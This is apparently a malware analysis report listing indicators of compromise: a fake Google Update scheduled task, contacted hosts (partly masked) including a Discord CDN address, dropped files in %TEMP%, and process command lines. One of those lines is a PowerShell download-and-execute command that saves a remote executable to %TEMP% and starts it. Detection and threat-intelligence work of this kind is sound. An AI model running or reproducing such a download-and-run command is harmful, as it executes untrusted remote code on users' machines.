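Technical Information
(Host names in this listing contain '#' characters, which are not valid in DNS names; they appear to be partially masked by the publisher, so the indicators below are not literal values and cannot be matched as-is.)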
- <SYSTEM32>\tasks\googleupdatetaskmachineqc
- http://ur##66.cf/load as (join-path -path $env:temp -childpath loaddg9huo.exe), i.e. saved to %TEMP%\loaddg9huo.exe
- <SYSTEM32>\conhost.exe
- %TEMP%\loaddg9huo.exe
- 'ur##66.cf':80
- 'ur##66.cf':443
- 'cd#.##scordapp.com':443
- http://ur##66.cf/LOAD
- 'ur##66.cf':443
- 'cd#.##scordapp.com':443
- DNS ASK ur##66.cf
- DNS ASK cd#.##scordapp.com
- '%TEMP%\loaddg9huo.exe'
- '%WINDIR%\syswow64\cmd.exe' /c powershell "(New-Object System.Net.WebClient).DownloadFile('http://ur##66.cf/LOAD', (Join-Path -Path $env:Temp -ChildPath 'LOADDg9HuO.exe'))" & powershell "Start-Process -FilePath (Join-Path...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "Start-Process -FilePath (Join-Path -Path $env:Temp -ChildPath 'LOADDg9HuO.exe')"